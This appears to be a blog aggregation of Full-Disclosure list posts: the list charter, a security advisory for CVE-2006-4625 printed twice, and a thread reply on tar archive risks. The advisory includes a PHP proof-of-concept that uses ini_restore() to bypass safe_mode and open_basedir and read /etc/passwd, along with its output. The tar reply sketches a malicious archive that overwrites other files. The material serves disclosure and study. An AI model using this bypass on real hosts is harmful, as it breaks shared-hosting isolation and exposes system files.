Subscription/unsubscription may be performed via the HTTP interface
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to
full-disclosure-request@lists.grok.org.uk, send the word 'help' in
either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending
members may be removed from the list by the management.

An archive of postings is available at
http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is
forbidden. Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive.
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they
should use discretion in executing any tools or code distributed via
this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.

Quoting should not exceed that which is necessary to convey context,
this is especially relevant to members subscribed to the digested
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or
S/MIME signatures, proof-of-concept code, etc) but must not be active
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to
list postings. Offenders will be excluded from the mailing list until
the problem is corrected.

Members may post to the list by emailing
full-disclosure@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address
mentioned above.

- Charter Additions/Changes -

The list charter will be published at
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the
management.

Alterations will be made after consultation with list members and a
concensus has been reached.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 9:05 AM.

Source: http://securityreason.com/achievement_securityalert/42

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- - Written: 05.09.2006
- - Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 < = x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.
httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.

For example:
open_basedir in httpd.conf

- ---
<Directory /usr/home/frajer/public_html/>
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>
- ---

In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()

Example:
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore
Master Value to Local Value per ini_restore() function!

- ---
ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
- ---

Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:
- ---
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
- ---

RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
- ---

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.

- --- 2. How to fix ---
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, l5x

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards
SecurityReason
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a
SvP3KPhmLtZcCNFmtGa8oJ8=
=bqQV
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 9:00 AM.

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- - Written: 05.09.2006

- - Public: 09.09.2006

SecurityAlert Id: 42

CVE: CVE-2006-4625

SecurityRisk: High

Affected Software: PHP 5.1.6 / 4.4.4 < = x

Advisory URL: http://securityreason.com/achievement_securityalert/42

Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific

features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig S�ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much

of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can

not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag

can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.

httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.

For example:

open_basedir in httpd.conf

- ---

<Directory /usr/home/frajer/public_html/>

Options FollowSymLinks MultiViews Indexes

AllowOverride None

php_admin_flag safe_mode 1

php_admin_value open_basedir /usr/home/frajer/public_html/

</Directory>

- ---

In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()

Example:

If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore

Master Value to Local Value per ini_restore() function!

- ---

ini_restore

(PHP 4, PHP 5)

ini_restore -- Restores the value of a configuration option

- ---

Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:

- ---

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

- ---

RESULT OF EXPLOIT:

- ---

1

/usr/home/frajer/public_html/

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):

(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in

/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in

/usr/home/frajer/public_html/ini_restore.php on line 4

# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

- ---

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.

- --- 2. How to fix ---

fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x

and

p_e_a, l5x

- --- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]

Email: cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards

SecurityReason

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a

SvP3KPhmLtZcCNFmtGa8oJ8=

=bqQV

-----END PGP SIGNATURE-----

0 Comments Published by Search on at 8:59 AM.

> What tar are you using? With every tarball I download the files within are
> given the owner:group of the user I extract them as.
>
> I have never seen a developer's username or group disclosed...

Yes, as a normal user, you can't create files locally owned by another
user, so they aren't, but the username/group are indeed in the tar file.
>From a couple of tarballs I have lying around my system:

me@localhost:/usr/local/src> tar tjvf nmap-3.50.tar.bz2
drwxr-xr-x fyodor/fyodor 0 2004-01-18 22:04 nmap-3.50/
-rw-r--r-- fyodor/fyodor 15318 2003-09-10 22:12 nmap-3.50/main.cc
-rw-r--r-- fyodor/fyodor 75134 2003-12-01 20:09 nmap-3.50/nmap.cc
-rw-r--r-- fyodor/fyodor 50952 2003-09-16 02:04 nmap-3.50/targets.cc
-rw-r--r-- fyodor/fyodor 67425 2003-09-20 05:03 nmap-3.50/tcpip.cc
-rw-r--r-- fyodor/fyodor 7490 2003-09-10 22:12 nmap-3.50/nmap_error.cc
-rw-r--r-- fyodor/fyodor 22068 2003-09-10 22:12 nmap-3.50/utils.cc
-rw-r--r-- fyodor/fyodor 41675 2003-09-10 22:12 nmap-3.50/idle_scan.cc
-rw-r--r-- fyodor/fyodor 68759 2003-09-10 22:12 nmap-3.50/osscan.cc
-rw-r--r-- fyodor/fyodor 46270 2003-12-18 16:42 nmap-3.50/output.cc
-rw-r--r-- fyodor/fyodor 71462 2003-12-01 20:09 nmap-3.50/scan_engine.cc
...

and

me@localhost:/usr/local/src> tar tzvf wget-1.9.1.tar.gz
drwxr-xr-x hniksic/hniksic 0 2003-11-11 18:42 wget-1.9.1/
drwxr-xr-x hniksic/hniksic 0 2003-11-11 18:42 wget-1.9.1/doc/
drwxr-xr-x hniksic/hniksic 0 2003-11-11 18:42 wget-1.9.1/doc/ChangeLog-branches/
-rw-r--r-- hniksic/hniksic 12928 2001-01-06 04:26 wget-1.9.1/doc/ChangeLog-branches/1.6_branch.ChangeLog
-rw-r--r-- hniksic/hniksic 23252 2003-11-08 18:46 wget-1.9.1/doc/ChangeLog
-rw-r--r-- hniksic/hniksic 4854 2003-10-23 18:53 wget-1.9.1/doc/Makefile.in
-rw-r--r-- hniksic/hniksic 1529 2003-10-04 06:34 wget-1.9.1/doc/ansi2knr.1
-rw-r--r-- hniksic/hniksic 4022 2001-11-30 02:32 wget-1.9.1/doc/sample.wgetrc
...

> Sure they are important. Would you want to manually chmod +x all executables
> and scripts? Manually chmod +r all documentation? Even stipulating that we
> could use the umask value to decide permissions it is still a PITA.

Using umask is perfectly fine, except in the case of executables, so
that is a good point.

> This can be mitigated if you don't blindly extract tarballs as root, and you
> only extract in safe locations. If you unpack stuff to '/' you deserve to
> hose your system.

Well, personally, I think it's just a joke that I can't extract the
contents of an archive as root and feel safe. I mean, think about it
for a second... It's not like I'm downloading a random executable and
running it without some trust. Sure, you shouldn't run programs
unnecessarily as root. That goes for any program, but that's a
precaution that's supposed to prevent unforseen vulnerabilities, and
shouldn't be needed to work around braindead default behavior. It's
like saying: never open emails from people you don't know. Yeah, it
might be a good idea, but it's a total failure of the software involved
to rely on that recommendation for security.

Now, beyond the root user issue, isn't it true that if I untar a
malicious archive as a normal user, that my own files could be squashed
too? If I always unpack source files in ~/src as a normal user, and
compile them in their own subdirectories as my own user, I could still
be at risk if I'm not careful. Suppose one day, I unpack foo-0.1.tar.gz
to the directory ~/src/foo-0.1. Then, the next day I download
bar-0.1.tar.gz, which I don't really trust. I just want to unpack it
and take a look at the source before I compile and install. So, I untar
it in ~/src. Let's suppose bar-0.1.tar.gz contains the following files:

bar-0.1/
foo-0.1/evil.c
bar-0.1/benign.c
...

So, this could inject evil code into my other program. If I were naive
enough to extract an archive in my home directory, my .profile could
receive a lovely shellcode.

> True, some boneheads don't package their stuff in a top-level directory
> potentially overwriting existing files in the pwd. Perhaps the GNU folks
> should add a 'noclobber' option....

Yes, I guess what I just described is what you were getting at.
noclobber would be great and all, except not all archive extractors
would behave this way, and if noclobber isn't the default, it will leave
new users vulnerable.

I just think it would be better to have a format that makes it easy to
enforce a top level directory for all files, and removes the leaks
mentioned above. I've searched around since my first posting, and I've
yet to find one, unfortunately.

cheers,
tim

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

0 Comments Published by Search on at 8:55 AM.